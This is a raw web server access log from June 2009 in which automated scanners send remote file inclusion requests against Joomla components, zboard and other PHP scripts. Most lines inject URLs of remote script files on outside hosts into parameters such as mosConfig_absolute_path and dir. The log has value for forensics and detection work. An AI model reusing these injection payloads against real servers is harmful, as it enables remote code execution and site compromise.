121.165.73.157 - - [26/Jun/2009:17:18:39 -0500] "GET /logs/access_log.1239408000//?path%5Bdocroot%5D=http://badwolfmx3.wghost.tv/xnova//includes/uiu.txt?? HTTP/1.1" 404 311 "-""Mozilla/5.0"
121.165.73.157 - - [26/Jun/2009:17:18:41 -0500] "GET //?path%5Bdocroot%5D=http://badwolfmx3.wghost.tv/xnova//includes/uiu.txt?? HTTP/1.1" 200 3245 "-""Mozilla/5.0"
121.165.73.157 - - [26/Jun/2009:17:19:06 -0500] "GET /logs//?path%5Bdocroot%5D=http://badwolfmx3.wghost.tv/xnova//includes/uiu.txt?? HTTP/1.1" 200 147335 "-""Mozilla/5.0"
63.223.85.28 - - [26/Jun/2009:17:20:45 -0500] "GET //administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.maerkischepolster.de//images/lib/idfx1.txt??? HTTP/1.1" 404 334 "-""Mozilla/5.0"
63.223.85.28 - - [26/Jun/2009:17:20:45 -0500] "GET /logs/access_log.1239408000//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.maerkischepolster.de//images/lib/idfx1.txt??? HTTP/1.1" 404 361 "-""Mozilla/5.0"
63.223.85.28 - - [26/Jun/2009:17:20:45 -0500] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.maerkischepolster.de//images/lib/idfx1.txt??? HTTP/1.1" 404 339 "-""Mozilla/5.0"
63.223.85.28 - - [26/Jun/2009:17:20:51 -0500] "GET /logs/access_log.1240444800//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.maerkischepolster.de//images/lib/idfx1.txt??? HTTP/1.1" 404 361 "-""Mozilla/5.0"
121.165.73.157 - - [26/Jun/2009:17:21:16 -0500] "GET /logs/access_log.1241740800//?path%5Bdocroot%5D=http://badwolfmx3.wghost.tv/xnova//includes/uiu.txt?? HTTP/1.1" 404 311 "-""Mozilla/5.0"
124.0.139.129 - - [26/Jun/2009:17:27:11 -0500] "GET /logs/access_log.1236211200//index.php?option=com_flyspray&Itemid=&mosConfig_absolute_path=http://www.knt.hs.kr///id1.txt??? HTTP/1.1" 404 320 "-""Mozilla/5.0"
124.0.139.129 - - [26/Jun/2009:17:27:11 -0500] "GET //index.php?option=com_flyspray&Itemid=&mosConfig_absolute_path=http://www.knt.hs.kr///id1.txt??? HTTP/1.1" 404 293 "-""Mozilla/5.0"
124.0.139.129 - - [26/Jun/2009:17:27:11 -0500] "GET /logs//index.php?option=com_flyspray&Itemid=&mosConfig_absolute_path=http://www.knt.hs.kr///id1.txt??? HTTP/1.1" 404 298 "-""Mozilla/5.0"
124.0.139.129 - - [26/Jun/2009:17:27:17 -0500] "GET /logs/access_log.1236643200//index.php?option=com_flyspray&Itemid=&mosConfig_absolute_path=http://www.knt.hs.kr///id1.txt??? HTTP/1.1" 404 320 "-""Mozilla/5.0"
82.194.87.219 - - [26/Jun/2009:17:27:59 -0500] "GET /logs//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.laubrotel.com/letter/id? HTTP/1.1" 404 339 "-""libwww-perl/5.822"
218.30.100.97 - - [26/Jun/2009:17:28:08 -0500] "GET /logs/access_log.1240358400//components/com_hashcash/server.php?mosConfig_absolute_path=http://prideknives.co.nz/log/1.txt? HTTP/1.1" 404 345 "-""Mozilla/5.0"
218.30.100.97 - - [26/Jun/2009:17:28:08 -0500] "GET //components/com_hashcash/server.php?mosConfig_absolute_path=http://prideknives.co.nz/log/1.txt? HTTP/1.1" 404 318 "-""Mozilla/5.0"
218.30.100.97 - - [26/Jun/2009:17:28:08 -0500] "GET /logs//components/com_hashcash/server.php?mosConfig_absolute_path=http://prideknives.co.nz/log/1.txt? HTTP/1.1" 404 323 "-""Mozilla/5.0"
218.30.100.97 - - [26/Jun/2009:17:28:08 -0500] "GET /logs/access_log.1239926400//components/com_hashcash/server.php?mosConfig_absolute_path=http://prideknives.co.nz/log/1.txt? HTTP/1.1" 404 345 "-""Mozilla/5.0"
124.0.139.129 - - [26/Jun/2009:17:29:07 -0500] "GET //index.php?option=com_flyspray&Itemid=&mosConfig_absolute_path=http://www.knt.hs.kr///id1.txt??? HTTP/1.1" 404 293 "-""Mozilla/5.0"
124.0.139.129 - - [26/Jun/2009:17:29:07 -0500] "GET /logs//index.php?option=com_flyspray&Itemid=&mosConfig_absolute_path=http://www.knt.hs.kr///id1.txt??? HTTP/1.1" 404 298 "-""Mozilla/5.0"
124.0.139.129 - - [26/Jun/2009:17:29:07 -0500] "GET /logs/access_log.1236211200//index.php?option=com_flyspray&Itemid=&mosConfig_absolute_path=http://www.knt.hs.kr///id1.txt??? HTTP/1.1" 404 320 "-""Mozilla/5.0"
65.55.208.123 - - [26/Jun/2009:17:29:12 -0500] "GET /robots.txt HTTP/1.1" 404 293 "-""msnbot/1.1 (+http://search.msn.com/msnbot.htm)"
65.55.208.123 - - [26/Jun/2009:17:29:13 -0500] "GET /logs/access_log.1199232000 HTTP/1.1" 304 - "-""msnbot/1.1 (+http://search.msn.com/msnbot.htm)"
124.0.139.129 - - [26/Jun/2009:17:29:18 -0500] "GET /logs/access_log.1236643200//index.php?option=com_flyspray&Itemid=&mosConfig_absolute_path=http://www.knt.hs.kr///id1.txt??? HTTP/1.1" 404 320 "-""Mozilla/5.0"
69.72.169.233 - - [26/Jun/2009:17:31:07 -0500] "GET ////index.php?option=com_loudmounth&Itemid=&mosConfig_absolute_path=http://barrasford.net/barras/1.swf?? HTTP/1.1" 404 295 "-""Mozilla/5.0"
69.72.169.233 - - [26/Jun/2009:17:31:07 -0500] "GET /logs////index.php?option=com_loudmounth&Itemid=&mosConfig_absolute_path=http://barrasford.net/barras/1.swf?? HTTP/1.1" 404 300 "-""Mozilla/5.0"
69.72.169.233 - - [26/Jun/2009:17:31:07 -0500] "GET /logs/access_log.1236211200////index.php?option=com_loudmounth&Itemid=&mosConfig_absolute_path=http://barrasford.net/barras/1.swf?? HTTP/1.1" 404 322 "-""Mozilla/5.0"
69.72.169.233 - - [26/Jun/2009:17:31:27 -0500] "GET /logs/access_log.1236643200////index.php?option=com_loudmounth&Itemid=&mosConfig_absolute_path=http://barrasford.net/barras/1.swf?? HTTP/1.1" 404 322 "-""Mozilla/5.0"
69.72.169.233 - - [26/Jun/2009:17:31:41 -0500] "GET ////index.php?option=com_loudmounth&Itemid=&mosConfig_absolute_path=http://barrasford.net/barras/1.swf?? HTTP/1.1" 404 295 "-""Mozilla/5.0"
69.72.169.233 - - [26/Jun/2009:17:31:41 -0500] "GET /logs////index.php?option=com_loudmounth&Itemid=&mosConfig_absolute_path=http://barrasford.net/barras/1.swf?? HTTP/1.1" 404 300 "-""Mozilla/5.0"
69.72.169.233 - - [26/Jun/2009:17:31:41 -0500] "GET /logs/access_log.1236211200////index.php?option=com_loudmounth&Itemid=&mosConfig_absolute_path=http://barrasford.net/barras/1.swf?? HTTP/1.1" 404 322 "-""Mozilla/5.0"
69.72.169.233 - - [26/Jun/2009:17:32:09 -0500] "GET /logs/access_log.1236643200////index.php?option=com_loudmounth&Itemid=&mosConfig_absolute_path=http://barrasford.net/barras/1.swf?? HTTP/1.1" 404 322 "-""Mozilla/5.0"
65.55.106.136 - - [26/Jun/2009:17:34:26 -0500] "GET /logs/access_log.1154131200 HTTP/1.1" 304 - "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
195.34.78.110 - - [26/Jun/2009:17:35:53 -0500] "GET ////index.php?option=com_loudmounth&Itemid=&mosConfig_absolute_path=http://barrasford.net/barras/1.swf?? HTTP/1.1" 404 295 "-""Mozilla/5.0"
195.34.78.110 - - [26/Jun/2009:17:35:53 -0500] "GET /logs////index.php?option=com_loudmounth&Itemid=&mosConfig_absolute_path=http://barrasford.net/barras/1.swf?? HTTP/1.1" 404 300 "-""Mozilla/5.0"
195.34.78.110 - - [26/Jun/2009:17:35:53 -0500] "GET /logs/access_log.1236211200////index.php?option=com_loudmounth&Itemid=&mosConfig_absolute_path=http://barrasford.net/barras/1.swf?? HTTP/1.1" 404 322 "-""Mozilla/5.0"
195.34.78.110 - - [26/Jun/2009:17:37:02 -0500] "GET ////index.php?option=com_bayesiannaivefilter&Itemid=&mosConfig_absolute_path=http://botscanner.michael17.com/BotId1.txt?? HTTP/1.1" 404 295 "-""Mozilla/5.0"
195.34.78.110 - - [26/Jun/2009:17:37:02 -0500] "GET /logs////index.php?option=com_bayesiannaivefilter&Itemid=&mosConfig_absolute_path=http://botscanner.michael17.com/BotId1.txt?? HTTP/1.1" 404 300 "-""Mozilla/5.0"
195.34.78.110 - - [26/Jun/2009:17:37:03 -0500] "GET /logs/access_log.1242000000////index.php?option=com_bayesiannaivefilter&Itemid=&mosConfig_absolute_path=http://botscanner.michael17.com/BotId1.txt?? HTTP/1.1" 404 322 "-""Mozilla/5.0"
195.34.78.110 - - [26/Jun/2009:17:37:09 -0500] "GET /logs/access_log.1241913600////index.php?option=com_bayesiannaivefilter&Itemid=&mosConfig_absolute_path=http://botscanner.michael17.com/BotId1.txt?? HTTP/1.1" 404 322 "-""Mozilla/5.0"
200.107.138.34 - - [26/Jun/2009:17:37:27 -0500] "GET /logs/access_log.1230422400//zboard/zboard.php?dir=http://shop.gaspard.de//Scripts/id2.txt?? HTTP/1.1" 404 328 "-""Mozilla/5.0"
200.107.138.34 - - [26/Jun/2009:17:37:27 -0500] "GET /logs//zboard/zboard.php?dir=http://shop.gaspard.de//Scripts/id2.txt?? HTTP/1.1" 404 306 "-""Mozilla/5.0"
200.107.138.34 - - [26/Jun/2009:17:37:27 -0500] "GET //zboard/zboard.php?dir=http://shop.gaspard.de//Scripts/id2.txt?? HTTP/1.1" 404 301 "-""Mozilla/5.0"
195.34.78.110 - - [26/Jun/2009:17:37:38 -0500] "GET ////index.php?option=com_bayesiannaivefilter&Itemid=&mosConfig_absolute_path=http://botscanner.michael17.com/BotId1.txt?? HTTP/1.1" 404 295 "-""Mozilla/5.0"
195.34.78.110 - - [26/Jun/2009:17:37:38 -0500] "GET /logs////index.php?option=com_bayesiannaivefilter&Itemid=&mosConfig_absolute_path=http://botscanner.michael17.com/BotId1.txt?? HTTP/1.1" 404 300 "-""Mozilla/5.0"
195.34.78.110 - - [26/Jun/2009:17:37:38 -0500] "GET /logs/access_log.1242000000////index.php?option=com_bayesiannaivefilter&Itemid=&mosConfig_absolute_path=http://botscanner.michael17.com/BotId1.txt?? HTTP/1.1" 404 322 "-""Mozilla/5.0"
195.34.78.110 - - [26/Jun/2009:17:37:43 -0500] "GET /logs/access_log.1241913600////index.php?option=com_bayesiannaivefilter&Itemid=&mosConfig_absolute_path=http://botscanner.michael17.com/BotId1.txt?? HTTP/1.1" 404 322 "-""Mozilla/5.0"
200.107.138.34 - - [26/Jun/2009:17:38:52 -0500] "GET /logs/access_log.1230422400//zboard/zboard.php?dir=http://shop.gaspard.de//Scripts/id2.txt?? HTTP/1.1" 404 328 "-""Mozilla/5.0"
200.107.138.34 - - [26/Jun/2009:17:39:02 -0500] "GET //zboard/zboard.php?dir=http://shop.gaspard.de//Scripts/id2.txt?? HTTP/1.1" 404 301 "-""Mozilla/5.0"
200.107.138.34 - - [26/Jun/2009:17:39:02 -0500] "GET /logs//zboard/zboard.php?dir=http://shop.gaspard.de//Scripts/id2.txt?? HTTP/1.1" 404 306 "-""Mozilla/5.0"
195.34.78.110 - - [26/Jun/2009:17:39:26 -0500] "GET /logs/access_log.1236643200////index.php?option=com_loudmounth&Itemid=&mosConfig_absolute_path=http://barrasford.net/barras/1.swf?? HTTP/1.1" 404 322 "-""Mozilla/5.0"
200.107.138.34 - - [26/Jun/2009:17:43:31 -0500] "GET //login.php?dir=http://shop.gaspard.de//Scripts/id2.txt?? HTTP/1.1" 404 293 "-""Mozilla/5.0"
200.107.138.34 - - [26/Jun/2009:17:43:31 -0500] "GET /logs/access_log.1238803200//login.php?dir=http://shop.gaspard.de//Scripts/id2.txt?? HTTP/1.1" 404 320 "-""Mozilla/5.0"
200.107.138.34 - - [26/Jun/2009:17:43:31 -0500] "GET /logs//login.php?dir=http://shop.gaspard.de//Scripts/id2.txt?? HTTP/1.1" 404 298 "-""Mozilla/5.0"
200.107.138.34 - - [26/Jun/2009:17:43:39 -0500] "GET /logs//login.php?dir=http://shop.gaspard.de//Scripts/id2.txt?? HTTP/1.1" 404 298 "-""Mozilla/5.0"
200.107.138.34 - - [26/Jun/2009:17:43:42 -0500] "GET //login.php?dir=http://shop.gaspard.de//Scripts/id2.txt?? HTTP/1.1" 404 293 "-""Mozilla/5.0"
200.107.138.34 - - [26/Jun/2009:17:43:44 -0500] "GET /logs/access_log.1232841600//login.php?dir=http://shop.gaspard.de//Scripts/id2.txt?? HTTP/1.1" 404 320 "-""Mozilla/5.0"
200.107.138.34 - - [26/Jun/2009:17:43:59 -0500] "GET /logs/access_log.1232841600//login.php?dir=http://shop.gaspard.de//Scripts/id2.txt?? HTTP/1.1" 404 320 "-""Mozilla/5.0"
61.250.85.185 - - [26/Jun/2009:17:44:10 -0500] "GET /logs//login.php?dir=http://shop.gaspard.de//Scripts/idxx.txt?? HTTP/1.1" 404 298 "-""Mozilla/5.0"
61.250.85.185 - - [26/Jun/2009:17:44:10 -0500] "GET /logs/access_log.1238803200//login.php?dir=http://shop.gaspard.de//Scripts/idxx.txt?? HTTP/1.1" 404 320 "-""Mozilla/5.0"
61.250.85.185 - - [26/Jun/2009:17:44:11 -0500] "GET //login.php?dir=http://shop.gaspard.de//Scripts/idxx.txt?? HTTP/1.1" 404 293 "-""Mozilla/5.0"
61.250.85.185 - - [26/Jun/2009:17:44:12 -0500] "GET /logs//login.php?dir=http://shop.gaspard.de//Scripts/idxx.txt?? HTTP/1.1" 404 298 "-""Mozilla/5.0"
61.250.85.185 - - [26/Jun/2009:17:44:12 -0500] "GET /logs/access_log.1238803200//login.php?dir=http://shop.gaspard.de//Scripts/idxx.txt?? HTTP/1.1" 404 320 "-""Mozilla/5.0"
61.250.85.185 - - [26/Jun/2009:17:44:13 -0500] "GET //login.php?dir=http://shop.gaspard.de//Scripts/idxx.txt?? HTTP/1.1" 404 293 "-""Mozilla/5.0"
61.250.85.185 - - [26/Jun/2009:17:44:16 -0500] "GET /logs/access_log.1232841600//login.php?dir=http://shop.gaspard.de//Scripts/idxx.txt?? HTTP/1.1" 404 320 "-""Mozilla/5.0"
61.250.85.185 - - [26/Jun/2009:17:44:19 -0500] "GET /logs/access_log.1232841600//login.php?dir=http://shop.gaspard.de//Scripts/idxx.txt?? HTTP/1.1" 404 320 "-""Mozilla/5.0"
123.143.98.5 - - [26/Jun/2009:17:45:42 -0500] "GET /logs//components/com_simpleboard/image_upload.php?sbp=http://www.usher.co.kr//flvPlay/fx29id.txt?? HTTP/1.1" 404 332 "-""Mozilla/5.0"
123.143.98.5 - - [26/Jun/2009:17:45:43 -0500] "GET /logs/access_log.1240444800//components/com_simpleboard/image_upload.php?sbp=http://www.usher.co.kr//flvPlay/fx29id.txt?? HTTP/1.1" 404 354 "-""Mozilla/5.0"
123.143.98.5 - - [26/Jun/2009:17:45:43 -0500] "GET //components/com_simpleboard/image_upload.php?sbp=http://www.usher.co.kr//flvPlay/fx29id.txt?? HTTP/1.1" 404 327 "-""Mozilla/5.0"
61.250.85.185 - - [26/Jun/2009:17:45:54 -0500] "GET /logs/access_log.1238803200//login.php?dir=http://shop.gaspard.de//Scripts/idxx.txt?? HTTP/1.1" 404 320 "-""Mozilla/5.0"
61.250.85.185 - - [26/Jun/2009:17:45:54 -0500] "GET /logs//login.php?dir=http://shop.gaspard.de//Scripts/idxx.txt?? HTTP/1.1" 404 298 "-""Mozilla/5.0"
61.250.85.185 - - [26/Jun/2009:17:45:54 -0500] "GET //login.php?dir=http://shop.gaspard.de//Scripts/idxx.txt?? HTTP/1.1" 404 293 "-""Mozilla/5.0"
61.250.85.185 - - [26/Jun/2009:17:45:58 -0500] "GET /logs/access_log.1232841600//login.php?dir=http://shop.gaspard.de//Scripts/idxx.txt?? HTTP/1.1" 404 320 "-""Mozilla/5.0"
61.250.85.185 - - [26/Jun/2009:17:46:00 -0500] "GET /logs/access_log.1238803200//login.php?dir=http://shop.gaspard.de//Scripts/idxx.txt?? HTTP/1.1" 404 320 "-""Mozilla/5.0"
61.250.85.185 - - [26/Jun/2009:17:46:00 -0500] "GET /logs//login.php?dir=http://shop.gaspard.de//Scripts/idxx.txt?? HTTP/1.1" 404 298 "-""Mozilla/5.0"
61.250.85.185 - - [26/Jun/2009:17:46:01 -0500] "GET //login.php?dir=http://shop.gaspard.de//Scripts/idxx.txt?? HTTP/1.1" 404 293 "-""Mozilla/5.0"
61.250.85.185 - - [26/Jun/2009:17:46:05 -0500] "GET /logs/access_log.1232841600//login.php?dir=http://shop.gaspard.de//Scripts/idxx.txt?? HTTP/1.1" 404 320 "-""Mozilla/5.0"
123.143.98.5 - - [26/Jun/2009:17:46:19 -0500] "GET /logs/access_log.1235865600//components/com_simpleboard/image_upload.php?sbp=http://www.usher.co.kr//flvPlay/fx29id.txt?? HTTP/1.1" 404 354 "-""Mozilla/5.0"
200.107.138.34 - - [26/Jun/2009:17:48:28 -0500] "GET /logs/access_log.1238803200//login.php?dir=http://shop.gaspard.de//Scripts/id2.txt?? HTTP/1.1" 404 320 "-""Mozilla/5.0"
200.107.138.34 - - [26/Jun/2009:17:48:28 -0500] "GET //login.php?dir=http://shop.gaspard.de//Scripts/id2.txt?? HTTP/1.1" 404 293 "-""Mozilla/5.0"
200.107.138.34 - - [26/Jun/2009:17:48:28 -0500] "GET /logs//login.php?dir=http://shop.gaspard.de//Scripts/id2.txt?? HTTP/1.1" 404 298 "-""Mozilla/5.0"
200.107.138.34 - - [26/Jun/2009:17:48:36 -0500] "GET /logs//login.php?dir=http://shop.gaspard.de//Scripts/id2.txt?? HTTP/1.1" 404 298 "-""Mozilla/5.0"
200.107.138.34 - - [26/Jun/2009:17:48:36 -0500] "GET //login.php?dir=http://shop.gaspard.de//Scripts/id2.txt?? HTTP/1.1" 404 293 "-""Mozilla/5.0"
200.107.138.34 - - [26/Jun/2009:17:48:36 -0500] "GET /logs/access_log.1238803200//login.php?dir=http://shop.gaspard.de//Scripts/id2.txt?? HTTP/1.1" 404 320 "-""Mozilla/5.0"
200.107.138.34 - - [26/Jun/2009:17:48:52 -0500] "GET /logs/access_log.1232841600//login.php?dir=http://shop.gaspard.de//Scripts/id2.txt?? HTTP/1.1" 404 320 "-""Mozilla/5.0"
82.194.87.219 - - [26/Jun/2009:17:51:02 -0500] "GET /logs///components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.laubrotel.com/letter/id? HTTP/1.1" 404 340 "-""libwww-perl/5.822"
85.25.147.102 - - [26/Jun/2009:17:52:38 -0500] "GET /logs/administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://www.m3h4x0r.xpg.com.br/000/abhieid.txt????? HTTP/1.1" 404 347 "-""libwww-perl/5.825"
85.25.147.102 - - [26/Jun/2009:17:52:38 -0500] "GET /administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://www.m3h4x0r.xpg.com.br/000/abhieid.txt????? HTTP/1.1" 404 342 "-""libwww-perl/5.825"
65.55.208.118 - - [26/Jun/2009:17:53:17 -0500] "GET /logs/access_log.1122508800 HTTP/1.1" 304 - "-""msnbot/1.1 (+http://search.msn.com/msnbot.htm)"
65.55.208.118 - - [26/Jun/2009:17:53:17 -0500] "GET /logs/access_log.1125187200 HTTP/1.1" 304 - "-""msnbot/1.1 (+http://search.msn.com/msnbot.htm)"
65.55.208.118 - - [26/Jun/2009:17:53:18 -0500] "GET /logs/access_log.1144886400 HTTP/1.1" 304 - "-""msnbot/1.1 (+http://search.msn.com/msnbot.htm)"
65.55.208.118 - - [26/Jun/2009:17:53:18 -0500] "GET /logs/access_log.1123718400 HTTP/1.1" 304 - "-""msnbot/1.1 (+http://search.msn.com/msnbot.htm)"
65.55.208.118 - - [26/Jun/2009:17:53:19 -0500] "GET /logs/access_log.1114992000 HTTP/1.1" 304 - "-""msnbot/1.1 (+http://search.msn.com/msnbot.htm)"
65.55.208.118 - - [26/Jun/2009:17:53:20 -0500] "GET /logs/access_log.1121212800 HTTP/1.1" 304 - "-""msnbot/1.1 (+http://search.msn.com/msnbot.htm)"
65.55.208.118 - - [26/Jun/2009:17:53:20 -0500] "GET /logs/access_log.1135468800 HTTP/1.1" 304 - "-""msnbot/1.1 (+http://search.msn.com/msnbot.htm)"
65.55.208.118 - - [26/Jun/2009:17:53:20 -0500] "GET /logs/access_log.1165363200 HTTP/1.1" 304 - "-""msnbot/1.1 (+http://search.msn.com/msnbot.htm)"
75.119.201.5 - - [26/Jun/2009:17:55:30 -0500] "GET /logs/skin/zero_vote/ask_password.php?dir=http://www.telsizdunyasi.com/vnc/fx29id.txt?? HTTP/1.1" 404 319 "-""Mozilla/5.0"
75.119.201.5 - - [26/Jun/2009:17:55:30 -0500] "GET /skin/zero_vote/ask_password.php?dir=http://www.telsizdunyasi.com/vnc/fx29id.txt?? HTTP/1.1" 404 314 "-""Mozilla/5.0"
75.119.201.5 - - [26/Jun/2009:17:55:30 -0500] "GET /logs/access_log.1232064000/skin/zero_vote/ask_password.php?dir=http://www.telsizdunyasi.com/vnc/fx29id.txt?? HTTP/1.1" 404 341 "-""Mozilla/5.0"
75.119.201.5 - - [26/Jun/2009:17:55:48 -0500] "GET /logs/access_log.1231718400/skin/zero_vote/ask_password.php?dir=http://www.telsizdunyasi.com/vnc/fx29id.txt?? HTTP/1.1" 404 341 "-""Mozilla/5.0"
65.55.208.123 - - [26/Jun/2009:18:00:44 -0500] "GET /logs/access_log.1124064000 HTTP/1.1" 304 - "-""msnbot/1.1 (+http://search.msn.com/msnbot.htm)"
65.55.208.123 - - [26/Jun/2009:18:02:11 -0500] "GET /logs/access_log.1218758400 HTTP/1.1" 304 - "-""msnbot/1.1 (+http://search.msn.com/msnbot.htm)"
125.131.116.12 - - [26/Jun/2009:18:15:41 -0500] "GET /logs//components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://prideknives.co.nz/log/1.txt? HTTP/1.1" 404 329 "-""Mozilla/5.0"
125.131.116.12 - - [26/Jun/2009:18:15:42 -0500] "GET //components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://prideknives.co.nz/log/1.txt? HTTP/1.1" 404 324 "-""Mozilla/5.0"
125.131.116.12 - - [26/Jun/2009:18:15:45 -0500] "GET /logs/access_log.1240185600//components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://prideknives.co.nz/log/1.txt? HTTP/1.1" 404 351 "-""Mozilla/5.0"
125.131.116.12 - - [26/Jun/2009:18:16:07 -0500] "GET /logs/access_log.1241740800//components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://prideknives.co.nz/log/1.txt? HTTP/1.1" 404 351 "-""Mozilla/5.0"
125.131.116.12 - - [26/Jun/2009:18:17:12 -0500] "GET /logs//components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://prideknives.co.nz/log/1.txt? HTTP/1.1" 404 329 "-""Mozilla/5.0"
125.131.116.12 - - [26/Jun/2009:18:17:12 -0500] "GET /logs/access_log.1240185600//components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://prideknives.co.nz/log/1.txt? HTTP/1.1" 404 351 "-""Mozilla/5.0"
125.131.116.12 - - [26/Jun/2009:18:17:12 -0500] "GET //components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://prideknives.co.nz/log/1.txt? HTTP/1.1" 404 324 "-""Mozilla/5.0"
125.131.116.12 - - [26/Jun/2009:18:17:42 -0500] "GET /logs/access_log.1241740800//components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://prideknives.co.nz/log/1.txt? HTTP/1.1" 404 351 "-""Mozilla/5.0"
216.75.60.116 - - [26/Jun/2009:18:26:24 -0500] "GET /logs//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://www.unreals.co.cc/idxx.txt?? HTTP/1.1" 404 325 "-""Mozilla/5.0"
216.75.60.116 - - [26/Jun/2009:18:26:24 -0500] "GET //ktmllite/includes/ktedit/toolbar.php?dirDepth=http://www.unreals.co.cc/idxx.txt?? HTTP/1.1" 404 320 "-""Mozilla/5.0"
216.75.60.116 - - [26/Jun/2009:18:26:24 -0500] "GET /logs/access_log.1240617600//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://www.unreals.co.cc/idxx.txt?? HTTP/1.1" 404 347 "-""Mozilla/5.0"
216.75.60.116 - - [26/Jun/2009:18:26:25 -0500] "GET /logs/access_log.1240617600//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://www.unreals.co.cc/idxx.txt?? HTTP/1.1" 404 347 "-""Mozilla/5.0"
216.75.60.116 - - [26/Jun/2009:18:26:25 -0500] "GET //ktmllite/includes/ktedit/toolbar.php?dirDepth=http://www.unreals.co.cc/idxx.txt?? HTTP/1.1" 404 320 "-""Mozilla/5.0"
216.75.60.116 - - [26/Jun/2009:18:26:25 -0500] "GET /logs//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://www.unreals.co.cc/idxx.txt?? HTTP/1.1" 404 325 "-""Mozilla/5.0"
216.75.60.116 - - [26/Jun/2009:18:26:33 -0500] "GET /logs/access_log.1240358400//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://www.unreals.co.cc/idxx.txt?? HTTP/1.1" 404 347 "-""Mozilla/5.0"
216.75.60.116 - - [26/Jun/2009:18:26:34 -0500] "GET /logs/access_log.1240358400//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://www.unreals.co.cc/idxx.txt?? HTTP/1.1" 404 347 "-""Mozilla/5.0"
63.223.85.28 - - [26/Jun/2009:18:27:44 -0500] "GET /logs//index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.maerkischepolster.de//images/lib/idfx1.txt??? HTTP/1.1" 404 298 "-""Mozilla/5.0"
63.223.85.28 - - [26/Jun/2009:18:27:44 -0500] "GET /logs/access_log.1230768000//index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.maerkischepolster.de//images/lib/idfx1.txt??? HTTP/1.1" 404 320 "-""Mozilla/5.0"
63.223.85.28 - - [26/Jun/2009:18:27:44 -0500] "GET //index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.maerkischepolster.de//images/lib/idfx1.txt??? HTTP/1.1" 404 293 "-""Mozilla/5.0"
63.223.85.28 - - [26/Jun/2009:18:27:44 -0500] "GET /logs/access_log.1236211200//index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.maerkischepolster.de//images/lib/idfx1.txt??? HTTP/1.1" 404 320 "-""Mozilla/5.0"
123.143.98.5 - - [26/Jun/2009:18:28:36 -0500] "GET /logs/access_log.1239753600//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://www.usher.co.kr//flvPlay/fx29id.txt?? HTTP/1.1" 404 347 "-""Mozilla/5.0"
123.143.98.5 - - [26/Jun/2009:18:28:37 -0500] "GET //ktmllite/includes/ktedit/toolbar.php?dirDepth=http://www.usher.co.kr//flvPlay/fx29id.txt?? HTTP/1.1" 404 320 "-""Mozilla/5.0"
123.143.98.5 - - [26/Jun/2009:18:28:37 -0500] "GET /logs//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://www.usher.co.kr//flvPlay/fx29id.txt?? HTTP/1.1" 404 325 "-""Mozilla/5.0"
123.143.98.5 - - [26/Jun/2009:18:28:57 -0500] "GET /logs/access_log.1240099200//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://www.usher.co.kr//flvPlay/fx29id.txt?? HTTP/1.1" 404 347 "-""Mozilla/5.0"
216.17.99.13 - - [26/Jun/2009:18:29:02 -0500] "GET /components/com_sitemap/sitemap.php?mosConfig_admin_path=http://rsh.kiev.ua/images/idfx1.txt? HTTP/1.1" 404 317 "-""Mozilla/5.0"
216.17.99.13 - - [26/Jun/2009:18:29:02 -0500] "GET /logs/access_log.1240358400/components/com_sitemap/sitemap.php?mosConfig_admin_path=http://rsh.kiev.ua/images/idfx1.txt? HTTP/1.1" 404 344 "-""Mozilla/5.0"
216.17.99.13 - - [26/Jun/2009:18:29:02 -0500] "GET /logs/components/com_sitemap/sitemap.php?mosConfig_admin_path=http://rsh.kiev.ua/images/idfx1.txt? HTTP/1.1" 404 322 "-""Mozilla/5.0"
216.17.99.13 - - [26/Jun/2009:18:29:02 -0500] "GET /logs/access_log.1239926400/components/com_sitemap/sitemap.php?mosConfig_admin_path=http://rsh.kiev.ua/images/idfx1.txt? HTTP/1.1" 404 344 "-""Mozilla/5.0"
216.17.99.13 - - [26/Jun/2009:18:30:05 -0500] "GET /logs/access_log.1242000000/components/com_sitemap/sitemap.php?mosConfig_admin_path=http://rsh.kiev.ua/images/idfx1.txt? HTTP/1.1" 404 344 "-""Mozilla/5.0"
85.17.162.28 - - [26/Jun/2009:18:35:00 -0500] "GET //program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://www.cecilcap.org/smf/_a?? HTTP/1.1" 404 342 "-""Mozilla/5.0"
85.17.162.28 - - [26/Jun/2009:18:35:00 -0500] "GET /logs//program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://www.cecilcap.org/smf/_a?? HTTP/1.1" 404 347 "-""Mozilla/5.0"
